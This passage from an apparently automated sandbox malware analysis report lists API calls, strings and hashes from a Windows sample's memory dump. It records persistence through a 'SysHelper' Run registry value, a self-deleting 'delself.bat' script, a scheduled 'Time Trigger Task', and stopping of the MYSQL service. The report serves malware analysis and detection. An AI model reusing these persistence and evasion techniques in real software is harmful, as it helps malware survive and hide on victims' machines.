                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                APIs
                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                APIs
                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                • GetLastError.KERNEL32 ref: 00412509
                • CloseHandle.KERNEL32 ref: 0041251C
                • CloseHandle.KERNEL32 ref: 00412539
                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                • GetLastError.KERNEL32 ref: 0041255B
                • CloseHandle.KERNEL32 ref: 0041256E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorLastMutex
                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                • API String ID: 2372642624-488272950
                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                APIs
                • DecodePointer.KERNEL32 ref: 00427B29
                • _free.LIBCMT ref: 00427B42
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • _free.LIBCMT ref: 00427B55
                • _free.LIBCMT ref: 00427B73
                • _free.LIBCMT ref: 00427B85
                • _free.LIBCMT ref: 00427B96
                • _free.LIBCMT ref: 00427BA1
                • _free.LIBCMT ref: 00427BC5
                • EncodePointer.KERNEL32(005D5550), ref: 00427BCC
                • _free.LIBCMT ref: 00427BE1
                • _free.LIBCMT ref: 00427BF7
                • _free.LIBCMT ref: 00427C1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID: PU]$hB]
                • API String ID: 3064303923-2625111752
                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                • API String ID: 909875538-2733969777
                • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                APIs
                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                • _malloc.LIBCMT ref: 0041BBE4
                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                • _free.LIBCMT ref: 0041BCD7
                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • IsWindow.USER32(?), ref: 0041BF69
                • DestroyWindow.USER32(?), ref: 0041BF7B
                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3873257347-0
                • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                APIs
                • CoInitialize.OLE32(00000000), ref: 00411BB0
                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                • CoUninitialize.OLE32 ref: 00411BD0
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                • lstrcatW.KERNEL32(?), ref: 00411C44
                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                • String ID: \shell32.dll
                • API String ID: 679253221-3783449302
                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                APIs
                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                • GetDesktopWindow.USER32 ref: 004549FB
                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                • _wcsstr.LIBCMT ref: 00454A8A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: Service-0x$_OPENSSL_isservice
                • API String ID: 2112994598-1672312481
                • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                APIs
                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                • __vfwprintf_p.LIBCMT ref: 00454B27
                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                • vswprintf.LIBCMT ref: 00454B5D
                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                • String ID: OPENSSL$OpenSSL: FATAL
                • API String ID: 277090408-1348657634
                • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                • _memset.LIBCMT ref: 004123B6
                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                • GetCommandLineW.KERNEL32 ref: 004123F4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                Strings
                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                • SysHelper, xrefs: 004123D6
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                • API String ID: 122392481-4165002228
                • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                • _memset.LIBCMT ref: 0040DC38
                • CoUninitialize.OLE32 ref: 0040DC92
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                • String ID: --Task$Comment$Time Trigger Task
                • API String ID: 330603062-1376107329
                • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                • Sleep.KERNEL32(?), ref: 00411A75
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                • String ID: MYSQL
                • API String ID: 2359367111-1651825290
                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                APIs
                • std::exception::exception.LIBCMT ref: 0044F27F
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F294
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • std::exception::exception.LIBCMT ref: 0044F2AD
                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                • std::exception::exception.LIBCMT ref: 0044F2FB
                • __CxxThrowException@8.LIBCMT ref: 0044F310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                • String ID: bad function call
                • API String ID: 2464034642-3612616537
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                • API String ID: 1717984340-2085858615
                • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 790675137-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                APIs
